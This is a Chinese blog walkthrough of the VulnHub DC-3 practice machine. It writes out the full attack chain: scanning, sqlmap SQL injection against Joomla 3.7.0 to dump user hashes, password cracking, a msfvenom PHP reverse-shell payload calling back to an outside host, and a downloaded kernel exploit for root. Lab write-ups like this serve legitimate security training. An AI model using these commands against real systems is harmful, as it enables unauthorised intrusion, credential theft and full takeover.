【打靶记录】DC-3打靶记录

最新推荐文章于 2024-08-08 08:23:55 发布
最新推荐文章于 2024-08-08 08:23:55 发布
阅读量62 收藏
点赞数 2
分类专栏: 打靶日记 文章标签: linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yun_jj/article/details/132057278
版权

 靶机地址

DC: 3.2 ~ VulnHub

一.进行信息收集
1.使用nmap扫描,进行主机发现

nmap -sn 192.168.25.0/24

  使用nmap扫描之后发现ip地址为:192.168.25.148

  2.使用nmap进行端口扫描

nmap -p 1-65535 -T4 -A -v 192.168.25.148

  发现其开启了80端口

 3.使用小工具收集web指纹信息

  这里可以发现其CMS为joomla,web服务器为apache2.4.18

4.访问192.168.25.148

5. 扫描敏感目录

dirsearch -u "http://192.168.25.148/"

 1.发现了登录相关的目录

 2.访问这个目录,出现了登录框

 3.我这里想的是,由于是一个joomla的cms系统,可以尝试使用cewl拉取一个密码字典,然后使用burpsuite进行用户名密码爆破,没有成功

二.漏洞扫描
1.使用joomla的专用扫描器joomscan扫描,只发现了版本号

joomscan -u 192.168.25.148

2.使用nmap的漏洞库扫描存在的漏洞

nmap --script=vuln -p80 192.168.25.148

 存在joomla 3.7.0存在一个sql注入漏洞

3.这里也可以使用searchsploit

searchsploit joomla 3.7.0

1 .同样找到了joomla 3.7.0 的sql注入漏洞以及它的利用方法

 2.找到这个漏洞的利用方法,可以使用searchsploit查找

searchsploit -p 42033

 3.打开这个txt文件,里面有使用sqlmap的利用方法

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

 三.漏洞利用
1.使用sqlmap获取数据

sudo sqlmap -u "http://<这里是靶机ip>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3
 --level=5 --random-agent --dbs -p list[fullordering]

 1.获取数据库名称

2.获取数据表,发现了一张"#__users"表

sudo sqlmap -u "http://192.168.25.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

3.拉取字段

sudo sqlmap -u "http://192.168.25.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" --columns -p list[fullordering] --dump

4.将密码复制保存到一个txt文件中

5.使用john解密

john joomla.txt

2.使用账户密码登录

 

1.浏览过程中发现这里可以上传文件,可以尝试上传木马

 

2.使用msfvenom模块生成一个木马文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.23.11.188 LPORT=4444 -f raw > shell.php

3.将生成的文件上传,如果不能成功上传,就直接创建文件,将木马内容复制

4.启动msf,使用exploit/multi/handler侦听4444端口,设置payload和ip

 5.上传的木马文件应当在这个目录下:

 

 6.访问这个目录下的文件,msf中成功上线

 四.权限提升
1.进入shell,使用python的pty模块反弹shell

python -c "import pty;pty.spawn('/bin/sh')";

 2.这里使用sudo提权和uid提权都不行

 3.尝试使用内核提权
1.查看内核版本,百度一下,Ubuntu版本为Ununtu16.04 

 2.使用searchsploit查找漏送利用方式

searchsploit Ubuntu 16.04

 3.查看漏洞利用方式

searchsploit -p 39772

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

4.这里提示这个脚本运行这两个命令就能提升权限

 4.去有执行权限的tmp目录下拉取脚本
1.拉取脚本

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

 2.解压39772.zip,并进入

unzip 39772.zip

 3.解压exploit.tar,并进入

tar -xvf exploit.tar

 4.执行命令,获取权限

./compile.sh

./doubleput

 5.去root目录下查看最终发flag

 

JBOSS_0528
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【技术分享】实战dc-3靶场及其技巧讲解
军火库
07-22 298
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
DC3打靶思路总结
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-03 1363
山有木兮木有枝,心悦君兮君不知。 ——佚名《越人歌》 一、信息收集 虚拟机搭建好之后,使用netdiscover探测网络中的IP地址,排除1,2,254这几个DNS、网关地址,显然目标IP是251地址: 使用masscan进行快速端口扫描,只发现了80端口,显然只有http服务: 访问目标端口,wappalyzer收集到的信息显示目标主机使用的CMS是joomla,web服务器是apache: 二、外围打点 二话不说,直接上漏扫,Xray yyds!!!! 根据漏扫信息显示,目标靶机存在Sql注.
靶机DC-3—WP
m0_66638011的博客
05-17 1360
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC-3靶场渗透】
一纸荒芜的博客
12-12 3441
DC3靶场打靶记录
打靶记录DC-6打靶记录
Yun_jj的博客
08-04 77
通过DC-6靶机,了解渗透的过程,熟悉了burpsuite,wpscan,dirsearch,nmap等工具的使用,进一步理解了命令注入漏洞的原理以及利用方式
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1058
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
打靶记录DC-7打靶记录
Yun_jj的博客
08-06 90
通过对DC-7的渗透,熟悉渗透流程,练习nmap,dirsearch等工具的使用,从网络上寻找关于dc-7作者的相关信息,通过社会工程学拿到敏感信息,打破原有思维方式,以天马行空的思路拿到root权限
打靶记录DC-1打靶记录
Yun_jj的博客
07-26 116
通过DC-1靶机,了解渗透的过程,从多方面加深学习
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
VB Access 打靶记录系统全套源码和数据库
01-19
源码说明: 完整可用的打靶记录系统源码,用于学生或新兵军训打靶记录,这是以前本人自己做的,绝对是原创。可作为初学者研究Access数据库,也可以在此基础上修改成其他系统,如学生成绩管理系统、体育比赛记录系统...
地空战-打靶游戏.rar
04-07
3. **图形学**:游戏中的视觉效果涉及到计算机图形学,包括3D建模、纹理贴图、光照和阴影计算等。 4. **网络编程**:如果是多人在线游戏,那么网络编程就很重要了,包括TCP/IP协议、UDP包传输、同步算法等。 5. **...
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
Linux shell编程学习笔记68: curl 命令行网络数据传输工具 选项数量雷人(上)
Purpleendurer@CSDN
08-04 1090
在网络时代,有经常需要在网络上传输数据,时我们需要通过网络下载文件,为了满足这种时代需要,Linux提供了众多网络命令,我们今天先研究curl命令。例如,我们可以使用curl从 URL 下载文件,或将文件上传到服务器。
Linux中宏观的看待线程
2301_77479435的博客
08-07 376
Linux中宏观的看待线程
linux 上源码编译安装 PolarDB-X
寂夜了无痕的博客
08-03 1018
linux上源码编译安装 PolarDB-X
Linux5:Shell编程——函数、重定向
纸上得来终觉浅
08-05 1485
Shell编程——函数、重定向
Linux 从基础到进阶】进程管理与性能调优
最新发布
weixin_39372311的博客
08-08 347
通过本文的介绍,您已经了解了 Linux 系统中进程管理和性能调优的基本概念和操作方法。本文提供了适用于 CentOS 和 Ubuntu 系统的具体命令和示例,涵盖了 CPU、内存、I/O 和网络的性能调优策略。合理的进程管理和性能调优可以显著提升系统的稳定性和运行效率。如有任何问题或需要进一步的帮助,请参考CentOS 官方文档和Ubuntu 官方文档或在 CSDN 博客中查阅相关内容。
简易炮台打靶系统设计——基于电子靶与激光笔
这篇论文描述的是一个在2012年“TI杯”黑龙江省大学生电子设计赛中参赛的项目,主题是炮台打靶系统的设计与实现。该系统由简易炮台和电子靶两部分组成,旨在提供一个模拟打靶训练的平台。炮台部分采用电动机驱动装置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值